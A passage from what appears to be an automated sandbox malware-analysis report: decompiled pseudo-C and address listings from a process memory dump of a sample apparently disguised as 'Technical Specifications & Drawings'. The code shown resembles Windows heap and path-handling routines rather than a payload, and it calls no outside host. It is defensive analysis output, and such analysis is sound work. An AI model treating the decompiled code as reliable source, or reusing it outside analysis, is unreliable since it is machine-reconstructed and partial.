                                                  														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                  													}
                                                  													_t395 = (_t393 & 0x000000ff) - _t427;
                                                  													__eflags = _t395;
                                                  													if(_t395 == 0) {
                                                  														_t511 = _t511 +  *_t469;
                                                  														__eflags = _t511;
                                                  													} else {
                                                  														_t398 = _t395 - 1;
                                                  														__eflags = _t398;
                                                  														if(_t398 == 0) {
                                                  															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                  															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                  														} else {
                                                  															__eflags = _t398 == 1;
                                                  															if(_t398 == 1) {
                                                  																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                  																_t402 =  *_t469 & 0x0000ffff;
                                                  																 *(_t528 - 0xac) = _t402;
                                                  																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                  															}
                                                  														}
                                                  													}
                                                  													__eflags = _t511 -  *(_t528 - 0xe4);
                                                  													if(_t511 <  *(_t528 - 0xe4)) {
                                                  														break;
                                                  													}
                                                  													_t397 =  *(_t528 - 0x88) + 1;
                                                  													 *(_t528 - 0x88) = _t397;
                                                  													_t469 = _t469 + 0x10;
                                                  													__eflags = _t397 -  *(_t528 + 0x1c);
                                                  													_t392 =  *(_t528 - 0xa2);
                                                  													if(_t397 <  *(_t528 + 0x1c)) {
                                                  														continue;
                                                  													}
                                                  													goto L45;
                                                  												}
                                                  												_t475 = 0x216;
                                                  												 *(_t528 - 0x74) = 0x216;
                                                  												goto L45;
                                                  											}
                                                  										} else {
                                                  											asm("lock dec dword [eax+ecx*8+0x4]");
                                                  											goto L16;
                                                  										}
                                                  									}
                                                  									_t491 = E01874CAB(_t306, _t528 - 0xa4);
                                                  									 *(_t528 - 0x74) = _t491;
                                                  									__eflags = _t491;
                                                  									if(_t491 != 0) {
                                                  										goto L91;
                                                  									} else {
                                                  										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                  										goto L20;
                                                  									}
                                                  								}
                                                  								L16:
                                                  								 *(_t528 - 0x74) = 0x1069;
                                                  								L93:
                                                  								_t298 =  *(_t528 - 0xd0) + 1;
                                                  								 *(_t528 - 0xd0) = _t298;
                                                  								_t474 = _t474 + _t511;
                                                  								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                  								_t494 = 4;
                                                  								__eflags = _t298 - _t494;
                                                  								if(_t298 >= _t494) {
                                                  									goto L100;
                                                  								}
                                                  								_t494 =  *(_t528 - 0xcc);
                                                  								_t435 = _t298;
                                                  								continue;
                                                  							}
                                                  							__eflags = _t494[2] | _t494[3];
                                                  							if((_t494[2] | _t494[3]) == 0) {
                                                  								goto L15;
                                                  							}
                                                  							goto L12;
                                                  						}
                                                  						__eflags = _t301;
                                                  						if(_t301 != 0) {
                                                  							goto L92;
                                                  						}
                                                  						goto L10;
                                                  						L92:
                                                  						goto L93;
                                                  					}
                                                  				} else {
                                                  					_push(0x57);
                                                  					L101:
                                                  					return E017FD130(_t427, _t494, _t511);
                                                  				}
                                                  			}

                                                  0x0187604a
                                                  0x0187604b
                                                  0x0187604c
                                                  0x0187604d
                                                  0x01876053
                                                  0x01876054
                                                  0x01876054
                                                  0x01876062
                                                  0x01876065
                                                  0x01876067
                                                  0x0187606a
                                                  0x01876070
                                                  0x01876075
                                                  0x01876076
                                                  0x01876081
                                                  0x01876087
                                                  0x01876095
                                                  0x01876099
                                                  0x0187609e
                                                  0x018760a4
                                                  0x018760ae
                                                  0x018760b0
                                                  0x018760b3
                                                  0x018760b6
                                                  0x018760b8
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760be
                                                  0x018760c0
                                                  0x018760c5
                                                  0x018760c5
                                                  0x018760c5
                                                  0x018760c6
                                                  0x018760cd
                                                  0x01876114
                                                  0x018760cf
                                                  0x018760cf
                                                  0x018760d4
                                                  0x018760d5
                                                  0x018760da
                                                  0x018760db
                                                  0x018760e1
                                                  0x018760e2
                                                  0x018760e8
                                                  0x018760f8
                                                  0x018760fd
                                                  0x018760fe
                                                  0x01876102
                                                  0x01876104
                                                  0x01876107
                                                  0x01876109
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610f
                                                  0x0187610f
                                                  0x01876117
                                                  0x0187611a
                                                  0x0187611f
                                                  0x01876125
                                                  0x01876134
                                                  0x01876139
                                                  0x0187613f
                                                  0x01876146
                                                  0x01876148
                                                  0x0187614b
                                                  0x0187614d
                                                  0x0187614f
                                                  0x0187614f
                                                  0x0187614f
                                                  0x0187614f
                                                  0x01876153
                                                  0x01876159
                                                  0x01876159
                                                  0x0187615c
                                                  0x01876163
                                                  0x01876169
                                                  0x0187616c
                                                  0x01876172
                                                  0x01876181
                                                  0x01876186
                                                  0x01876187
                                                  0x0187618b
                                                  0x01876191
                                                  0x01876195
                                                  0x018761a3
                                                  0x018761bb
                                                  0x018761c0
                                                  0x018761c3
                                                  0x018761cc
                                                  0x018761d0
                                                  0x018761dc
                                                  0x018761de
                                                  0x018761e1
                                                  0x018761e4
                                                  0x018761e6
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e6
                                                  0x018761ec
                                                  0x018761f3
                                                  0x01876203
                                                  0x01876209
                                                  0x0187620a
                                                  0x01876216
                                                  0x0187621d
                                                  0x01876227
                                                  0x01876241
                                                  0x01876246
                                                  0x0187624c
                                                  0x01876257
                                                  0x01876259
                                                  0x0187625c
                                                  0x0187625e
                                                  0x01876260
                                                  0x01876260
                                                  0x01876260
                                                  0x01876260
                                                  0x0187625e
                                                  0x01876264
                                                  0x01876267
                                                  0x01876269
                                                  0x01876315
                                                  0x01876315
                                                  0x0187631b
                                                  0x0187631e
                                                  0x01876324
                                                  0x01876327
                                                  0x0187632f
                                                  0x01876330
                                                  0x01876333
                                                  0x0187633a
                                                  0x0187633c
                                                  0x01876335
                                                  0x01876335
                                                  0x01876335
                                                  0x0187633f
                                                  0x01876342
                                                  0x0187634c
                                                  0x01876352
                                                  0x01876355
                                                  0x01876355
                                                  0x01876359
                                                  0x00000000
                                                  0x0187626f
                                                  0x01876275
                                                  0x01876275
                                                  0x01876278
                                                  0x0187627e
                                                  0x0187627e
                                                  0x01876281
                                                  0x01876287
                                                  0x0187628d
                                                  0x01876298
                                                  0x0187629c
                                                  0x018762a2
                                                  0x0187629e
                                                  0x0187629e
                                                  0x0187629e
                                                  0x018762a7
                                                  0x018762a7
                                                  0x018762aa
                                                  0x018762b0
                                                  0x018762f0
                                                  0x018762f0
                                                  0x018762f2
                                                  0x018762f8
                                                  0x018762fd
                                                  0x018762b2
                                                  0x018762b2
                                                  0x018762b2
                                                  0x018762b5
                                                  0x018762dd
                                                  0x018762e2
                                                  0x018762e5
                                                  0x018762b7
                                                  0x018762b8
                                                  0x018762bb
                                                  0x018762bd
                                                  0x018762c0
                                                  0x018762c4
                                                  0x018762cd
                                                  0x018762cd
                                                  0x018762c0
                                                  0x018762bb
                                                  0x018762b5
                                                  0x01876302
                                                  0x01876303
                                                  0x01876305
                                                  0x01876305
                                                  0x01876305
                                                  0x0187630c
                                                  0x0187630c
                                                  0x00000000
                                                  0x0187627e
                                                  0x01876269
                                                  0x01875eac
                                                  0x01875ebb
                                                  0x01875ebe
                                                  0x01875ecb
                                                  0x01875ecb
                                                  0x01875ece
                                                  0x01875ece
                                                  0x01875ed4
                                                  0x01875ed7
                                                  0x01875ed9
                                                  0x01875edb
                                                  0x01875edb
                                                  0x01875ee1
                                                  0x01875ee1
                                                  0x01875ee3
                                                  0x01875f20
                                                  0x01875f20
                                                  0x01875ee5
                                                  0x01875ee5
                                                  0x01875ee5
                                                  0x01875ee8
                                                  0x01875f11
                                                  0x01875f18
                                                  0x01875eea
                                                  0x01875eea
                                                  0x01875eed
                                                  0x01875ef2
                                                  0x01875ef8
                                                  0x01875efb
                                                  0x01875f0a
                                                  0x01875f0a
                                                  0x01875eed
                                                  0x01875ee8
                                                  0x01875f22
                                                  0x01875f28
                                                  0x00000000
                                                  0x00000000
                                                  0x01875f30
                                                  0x01875f31
                                                  0x01875f37
                                                  0x01875f3a
                                                  0x01875f3d
                                                  0x01875f44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01875f46
                                                  0x01875f48
                                                  0x01875f4d
                                                  0x00000000
                                                  0x01875f4d
                                                  0x01875dda
                                                  0x01875ddf
                                                  0x00000000
                                                  0x01875ddf
                                                  0x01875dd8
                                                  0x01875da7
                                                  0x01875da9
                                                  0x01875dac
                                                  0x01875dae
                                                  0x00000000
                                                  0x01875db4
                                                  0x01875db4
                                                  0x00000000
                                                  0x01875db4
                                                  0x01875dae
                                                  0x01875d88
                                                  0x01875d8d
                                                  0x01876363
                                                  0x01876369
                                                  0x0187636a
                                                  0x01876370
                                                  0x01876372
                                                  0x0187637a
                                                  0x0187637b
                                                  0x0187637d
                                                  0x00000000
                                                  0x00000000
                                                  0x0187637f
                                                  0x01876385
                                                  0x00000000
                                                  0x01876385
                                                  0x01875d38
                                                  0x01875d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d3b
                                                  0x01875d27
                                                  0x01875d29
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01876360
                                                  0x00000000
                                                  0x01876360
                                                  0x01875c10
                                                  0x01875c10
                                                  0x018763da
                                                  0x018763e5
                                                  0x018763e5

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                  • Instruction ID: 9771333deee99479cd2b4da13564b013ac13bd8b2da58ae1ce6a2d1f72b94664
                                                  • Opcode Fuzzy Hash: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                  • Instruction Fuzzy Hash: C2423C75900619CFEB25CF68C884BA9BBB1FF49304F1481AAD94DEB242E774DA85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E017C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                  				signed int _v8;
                                                  				void* _v20;
                                                  				signed int _v24;
                                                  				char _v532;
                                                  				char _v540;
                                                  				signed short _v544;
                                                  				signed int _v548;
                                                  				signed short* _v552;
                                                  				signed short _v556;
                                                  				signed short* _v560;
                                                  				signed short* _v564;
                                                  				signed short* _v568;
                                                  				void* _v570;
                                                  				signed short* _v572;
                                                  				signed short _v576;
                                                  				signed int _v580;
                                                  				char _v581;
                                                  				void* _v584;
                                                  				unsigned int _v588;
                                                  				signed short* _v592;
                                                  				void* _v597;
                                                  				void* _v600;
                                                  				void* _v604;
                                                  				void* _v609;
                                                  				void* _v616;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				unsigned int _t161;
                                                  				signed int _t162;
                                                  				unsigned int _t163;
                                                  				void* _t169;
                                                  				signed short _t173;
                                                  				signed short _t177;
                                                  				signed short _t181;
                                                  				unsigned int _t182;
                                                  				signed int _t185;
                                                  				signed int _t213;
                                                  				signed int _t225;
                                                  				short _t233;
                                                  				signed char _t234;
                                                  				signed int _t242;
                                                  				signed int _t243;
                                                  				signed int _t244;
                                                  				signed int _t245;
                                                  				signed int _t250;
                                                  				void* _t251;
                                                  				signed short* _t254;
                                                  				void* _t255;
                                                  				signed int _t256;
                                                  				void* _t257;
                                                  				signed short* _t260;
                                                  				signed short _t265;
                                                  				signed short* _t269;
                                                  				signed short _t271;
                                                  				signed short** _t272;
                                                  				signed short* _t275;
                                                  				signed short _t282;
                                                  				signed short _t283;
                                                  				signed short _t290;
                                                  				signed short _t299;
                                                  				signed short _t307;
                                                  				signed int _t308;
                                                  				signed short _t311;
                                                  				signed short* _t315;
                                                  				signed short _t316;
                                                  				void* _t317;
                                                  				void* _t319;
                                                  				signed short* _t321;
                                                  				void* _t322;
                                                  				void* _t323;
                                                  				unsigned int _t324;
                                                  				signed int _t325;
                                                  				void* _t326;
                                                  				signed int _t327;
                                                  				signed int _t329;
                                                  
                                                  				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                  				_v8 =  *0x189d360 ^ _t329;
                                                  				_t157 = _a8;
                                                  				_t321 = _a4;
                                                  				_t315 = __edx;
                                                  				_v548 = __ecx;
                                                  				_t305 = _a20;
                                                  				_v560 = _a12;
                                                  				_t260 = _a16;
                                                  				_v564 = __edx;
                                                  				_v580 = _a8;
                                                  				_v572 = _t260;
                                                  				_v544 = _a20;
                                                  				if( *__edx <= 8) {
                                                  					L3:
                                                  					if(_t260 != 0) {
                                                  						 *_t260 = 0;
                                                  					}
                                                  					_t254 =  &_v532;
                                                  					_v588 = 0x208;
                                                  					if((_v548 & 0x00000001) != 0) {
                                                  						_v556 =  *_t315;
                                                  						_v552 = _t315[2];
                                                  						_t161 = E017DF232( &_v556);
                                                  						_t316 = _v556;
                                                  						_v540 = _t161;
                                                  						goto L17;
                                                  					} else {
                                                  						_t306 = 0x208;
                                                  						_t298 = _t315;
                                                  						_t316 = E017C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                  						if(_t316 == 0) {
                                                  							L68:
                                                  							_t322 = 0xc0000033;
                                                  							goto L39;
                                                  						} else {
                                                  							while(_v581 == 0) {
                                                  								_t233 = _v588;
                                                  								if(_t316 > _t233) {
                                                  									_t234 = _v548;
                                                  									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                  										_t254 = L017C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                  										if(_t254 == 0) {
                                                  											_t169 = 0xc0000017;
                                                  										} else {
                                                  											_t298 = _v564;
                                                  											_v588 = _t316;
                                                  											_t306 = _t316;
                                                  											_t316 = E017C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                  											if(_t316 != 0) {
                                                  												continue;
                                                  											} else {
                                                  												goto L68;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										goto L90;
                                                  									}
                                                  								} else {
                                                  									_v556 = _t316;
                                                  									 *((short*)(_t329 + 0x32)) = _t233;
                                                  									_v552 = _t254;
                                                  									if(_t316 < 2) {
                                                  										L11:
                                                  										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                  											_t161 = 5;
                                                  										} else {
                                                  											if(_t316 < 6) {
                                                  												L87:
                                                  												_t161 = 3;
                                                  											} else {
                                                  												_t242 = _t254[2] & 0x0000ffff;
                                                  												if(_t242 != 0x5c) {
                                                  													if(_t242 == 0x2f) {
                                                  														goto L16;
                                                  													} else {
                                                  														goto L87;
                                                  													}
                                                  													goto L101;
                                                  												} else {
                                                  													L16:
                                                  													_t161 = 2;
                                                  												}
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t243 =  *_t254 & 0x0000ffff;
                                                  										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                  											if(_t316 < 4) {
                                                  												L81:
                                                  												_t161 = 4;
                                                  												goto L17;
                                                  											} else {
                                                  												_t244 = _t254[1] & 0x0000ffff;
                                                  												if(_t244 != 0x5c) {
                                                  													if(_t244 == 0x2f) {
                                                  														goto L60;
                                                  													} else {
                                                  														goto L81;
                                                  													}
                                                  												} else {
                                                  													L60:
                                                  													if(_t316 < 6) {
                                                  														L83:
                                                  														_t161 = 1;
                                                  														goto L17;
                                                  													} else {
                                                  														_t245 = _t254[2] & 0x0000ffff;
                                                  														if(_t245 != 0x2e) {
                                                  															if(_t245 == 0x3f) {
                                                  																goto L62;
                                                  															} else {
                                                  																goto L83;
                                                  															}
                                                  														} else {
                                                  															L62:
                                                  															if(_t316 < 8) {
                                                  																L85:
                                                  																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                  																goto L17;
                                                  															} else {
                                                  																_t250 = _t254[3] & 0x0000ffff;
                                                  																if(_t250 != 0x5c) {
                                                  																	if(_t250 == 0x2f) {
                                                  																		goto L64;
                                                  																	} else {
                                                  																		goto L85;
                                                  																	}
                                                  																} else {
                                                  																	L64:
                                                  																	_t161 = 6;
                                                  																	goto L17;
                                                  																}
                                                  															}
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											goto L101;
                                                  										} else {
                                                  											goto L11;
                                                  										}
                                                  									}
                                                  									L17:
                                                  									if(_t161 != 2) {
                                                  										_t162 = _t161 - 1;
                                                  										if(_t162 > 5) {
                                                  											goto L18;
                                                  										} else {
                                                  											switch( *((intOrPtr*)(_t162 * 4 +  &M017C45F8))) {
                                                  												case 0:
                                                  													_v568 = 0x1781078;
                                                  													__eax = 2;
                                                  													goto L20;
                                                  												case 1:
                                                  													goto L18;
                                                  												case 2:
                                                  													_t163 = 4;
                                                  													goto L19;
                                                  											}
                                                  										}
                                                  										goto L41;
                                                  									} else {
                                                  										L18:
                                                  										_t163 = 0;
                                                  										L19:
                                                  										_v568 = 0x17811c4;
                                                  									}
                                                  									L20:
                                                  									_v588 = _t163;
                                                  									_v564 = _t163 + _t163;
                                                  									_t306 =  *_v568 & 0x0000ffff;
                                                  									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                  									_v576 = _t265;
                                                  									if(_t265 > 0xfffe) {
                                                  										L90:
                                                  										_t322 = 0xc0000106;
                                                  									} else {
                                                  										if(_t321 != 0) {
                                                  											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                  												if(_v580 != 0) {
                                                  													goto L23;
                                                  												} else {
                                                  													_t322 = 0xc0000106;
                                                  													goto L39;
                                                  												}
                                                  											} else {
                                                  												_t177 = _t306;
                                                  												goto L25;
                                                  											}
                                                  											goto L101;
                                                  										} else {
                                                  											if(_v580 == _t321) {
                                                  												_t322 = 0xc000000d;
                                                  											} else {
                                                  												L23:
                                                  												_t173 = L017C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                  												_t269 = _v592;
                                                  												_t269[2] = _t173;
                                                  												if(_t173 == 0) {
                                                  													_t322 = 0xc0000017;
                                                  												} else {
                                                  													_t316 = _v556;
                                                  													 *_t269 = 0;
                                                  													_t321 = _t269;
                                                  													_t269[1] = _v576;
                                                  													_t177 =  *_v568 & 0x0000ffff;
                                                  													L25:
                                                  													_v580 = _t177;
                                                  													if(_t177 == 0) {
                                                  														L29:
                                                  														_t307 =  *_t321 & 0x0000ffff;
                                                  													} else {
                                                  														_t290 =  *_t321 & 0x0000ffff;
                                                  														_v576 = _t290;
                                                  														_t310 = _t177 & 0x0000ffff;
                                                  														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                  															_t307 =  *_t321 & 0xffff;
                                                  														} else {
                                                  															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                  															E017EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                  															_t329 = _t329 + 0xc;
                                                  															_t311 = _v580;
                                                  															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                  															 *_t321 = _t225;
                                                  															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                  																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  															}
                                                  															goto L29;
                                                  														}
                                                  													}
                                                  													_t271 = _v556 - _v588 + _v588;
                                                  													_v580 = _t307;
                                                  													_v576 = _t271;
                                                  													if(_t271 != 0) {
                                                  														_t308 = _t271 & 0x0000ffff;
                                                  														_v588 = _t308;
                                                  														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                  															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                  															E017EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                  															_t329 = _t329 + 0xc;
                                                  															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                  															 *_t321 = _t213;
                                                  															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                  																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                  															}
                                                  														}
                                                  													}
                                                  													_t272 = _v560;
                                                  													if(_t272 != 0) {
                                                  														 *_t272 = _t321;
                                                  													}
                                                  													_t306 = 0;
                                                  													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  													_t275 = _v572;
                                                  													if(_t275 != 0) {
                                                  														_t306 =  *_t275;
                                                  														if(_t306 != 0) {
                                                  															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                  														}
                                                  													}
                                                  													_t181 = _v544;
                                                  													if(_t181 != 0) {
                                                  														 *_t181 = 0;
                                                  														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                  														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                  														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                  														if(_v540 == 5) {
                                                  															_t182 = E017A52A5(1);
                                                  															_v588 = _t182;
                                                  															if(_t182 == 0) {
                                                  																E017BEB70(1, 0x18979a0);
                                                  																goto L38;
                                                  															} else {
                                                  																_v560 = _t182 + 0xc;
                                                  																_t185 = E017BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                  																if(_t185 == 0) {
                                                  																	_t324 = _v588;
                                                  																	goto L97;
                                                  																} else {
                                                  																	_t306 = _v544;
                                                  																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                  																	 *(_t306 + 4) = _t282;
                                                  																	_v576 = _t282;
                                                  																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                  																	 *_t306 = _t325;
                                                  																	if( *_t282 == 0x5c) {
                                                  																		_t149 = _t325 - 2; // -2
                                                  																		_t283 = _t149;
                                                  																		 *_t306 = _t283;
                                                  																		 *(_t306 + 4) = _v576 + 2;
                                                  																		_t185 = _t283 & 0x0000ffff;
                                                  																	}
                                                  																	_t324 = _v588;
                                                  																	 *(_t306 + 2) = _t185;
                                                  																	if((_v548 & 0x00000002) == 0) {
                                                  																		L97:
                                                  																		asm("lock xadd [esi], eax");
                                                  																		if((_t185 | 0xffffffff) == 0) {
                                                  																			_push( *((intOrPtr*)(_t324 + 4)));
                                                  																			E017E95D0();
                                                  																			L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                  																		}
                                                  																	} else {
                                                  																		 *(_t306 + 0xc) = _t324;
                                                  																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                  																	}
                                                  																	goto L38;
                                                  																}
                                                  															}
                                                  															goto L41;
                                                  														}
                                                  													}
                                                  													L38:
                                                  													_t322 = 0;
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  									L39:
                                                  									if(_t254 !=  &_v532) {
                                                  										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                  									}
                                                  									_t169 = _t322;
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							goto L68;
                                                  						}
                                                  					}
                                                  					L41:
                                                  					_pop(_t317);
                                                  					_pop(_t323);
                                                  					_pop(_t255);
                                                  					return E017EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                  				} else {
                                                  					_t299 = __edx[2];
                                                  					if( *_t299 == 0x5c) {
                                                  						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                  						if(_t256 != 0x5c) {
                                                  							if(_t256 != 0x3f) {
                                                  								goto L2;
                                                  							} else {
                                                  								goto L50;
                                                  							}
                                                  						} else {
                                                  							L50:
                                                  							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                  								goto L2;
                                                  							} else {
                                                  								_t251 = E017E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                  								_pop(_t319);
                                                  								_pop(_t326);
                                                  								_pop(_t257);
                                                  								return E017EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                  							}
                                                  						}
                                                  					} else {
                                                  						L2:
                                                  						_t260 = _v572;
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				L101:
                                                  			}















































































                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c45d1
                                                  0x00000000
                                                  0x00000000
                                                  0x017c45ca
                                                  0x00000000
                                                  0x017c4247
                                                  0x017c4247
                                                  0x017c4247
                                                  0x017c4249
                                                  0x017c4249
                                                  0x017c4249
                                                  0x017c4251
                                                  0x017c4251
                                                  0x017c4257
                                                  0x017c425f
                                                  0x017c426e
                                                  0x017c4270
                                                  0x017c427a
                                                  0x0180e219
                                                  0x0180e219
                                                  0x017c4280
                                                  0x017c4282
                                                  0x017c4456
                                                  0x017c45ea
                                                  0x00000000
                                                  0x017c45f0
                                                  0x0180e223
                                                  0x00000000
                                                  0x0180e223
                                                  0x017c445c
                                                  0x017c445c
                                                  0x00000000
                                                  0x017c445c
                                                  0x00000000
                                                  0x017c4288
                                                  0x017c428c
                                                  0x0180e298
                                                  0x017c4292
                                                  0x017c4292
                                                  0x017c429e
                                                  0x017c42a3
                                                  0x017c42a7
                                                  0x017c42ac
                                                  0x0180e22d
                                                  0x017c42b2
                                                  0x017c42b2
                                                  0x017c42b9
                                                  0x017c42bc
                                                  0x017c42c2
                                                  0x017c42ca
                                                  0x017c42cd
                                                  0x017c42cd
                                                  0x017c42d4
                                                  0x017c433f
                                                  0x017c433f
                                                  0x017c42d6
                                                  0x017c42d6
                                                  0x017c42d9
                                                  0x017c42dd
                                                  0x017c42eb
                                                  0x0180e23a
                                                  0x017c42f1
                                                  0x017c4305
                                                  0x017c430d
                                                  0x017c4315
                                                  0x017c4318
                                                  0x017c431f
                                                  0x017c4322
                                                  0x017c432e
                                                  0x017c433b
                                                  0x017c433b
                                                  0x00000000
                                                  0x017c432e
                                                  0x017c42eb
                                                  0x017c434c
                                                  0x017c434e
                                                  0x017c4352
                                                  0x017c4359
                                                  0x017c435e
                                                  0x017c4361
                                                  0x017c436e
                                                  0x017c438a
                                                  0x017c438e
                                                  0x017c4396
                                                  0x017c439e
                                                  0x017c43a1
                                                  0x017c43ad
                                                  0x017c43bb
                                                  0x017c43bb
                                                  0x017c43ad
                                                  0x017c436e
                                                  0x017c43bf
                                                  0x017c43c5
                                                  0x017c4463
                                                  0x017c4463
                                                  0x017c43ce
                                                  0x017c43d5
                                                  0x017c43d9
                                                  0x017c43df
                                                  0x017c4475
                                                  0x017c4479
                                                  0x017c4491
                                                  0x017c4491
                                                  0x017c4479
                                                  0x017c43e5
                                                  0x017c43eb
                                                  0x017c43f4
                                                  0x017c43f6
                                                  0x017c43f9
                                                  0x017c43fc
                                                  0x017c43ff
                                                  0x017c44e8
                                                  0x017c44ed
                                                  0x017c44f3
                                                  0x0180e247
                                                  0x00000000
                                                  0x017c44f9
                                                  0x017c4504
                                                  0x017c4508
                                                  0x017c450f
                                                  0x0180e269
                                                  0x00000000
                                                  0x017c4515
                                                  0x017c4519
                                                  0x017c4531
                                                  0x017c4534
                                                  0x017c4537
                                                  0x017c453e
                                                  0x017c4541
                                                  0x017c454a
                                                  0x0180e255
                                                  0x0180e255
                                                  0x0180e25b
                                                  0x0180e25e
                                                  0x0180e261
                                                  0x0180e261
                                                  0x017c4555
                                                  0x017c4559
                                                  0x017c455d
                                                  0x0180e26d
                                                  0x0180e270
                                                  0x0180e274
                                                  0x0180e27a
                                                  0x0180e27d
                                                  0x0180e28e
                                                  0x0180e28e
                                                  0x017c4563
                                                  0x017c4563
                                                  0x017c4569
                                                  0x017c4569
                                                  0x00000000
                                                  0x017c455d
                                                  0x017c450f
                                                  0x00000000
                                                  0x017c44f3
                                                  0x017c43ff
                                                  0x017c4405
                                                  0x017c4405
                                                  0x017c4405
                                                  0x017c42ac
                                                  0x017c428c
                                                  0x017c4282
                                                  0x017c4407
                                                  0x017c440d
                                                  0x0180e2af
                                                  0x0180e2af
                                                  0x017c4413
                                                  0x017c4413
                                                  0x00000000
                                                  0x017c41d4
                                                  0x00000000
                                                  0x017c41c3
                                                  0x017c41bd
                                                  0x017c4415
                                                  0x017c4415
                                                  0x017c4416
                                                  0x017c4417
                                                  0x017c4429
                                                  0x017c416e
                                                  0x017c416e
                                                  0x017c4175
                                                  0x017c4498
                                                  0x017c449f
                                                  0x0180e12d
                                                  0x00000000
                                                  0x0180e133
                                                  0x00000000
                                                  0x0180e133
                                                  0x017c44a5
                                                  0x017c44a5
                                                  0x017c44aa
                                                  0x00000000
                                                  0x017c44bb
                                                  0x017c44ca
                                                  0x017c44d6
                                                  0x017c44d7
                                                  0x017c44d8
                                                  0x017c44e3
                                                  0x017c44e3
                                                  0x017c44aa
                                                  0x017c417b
                                                  0x017c417b
                                                  0x017c417b
                                                  0x00000000
                                                  0x017c417b
                                                  0x017c4175
                                                  0x00000000

                                                  Memory Dump Source
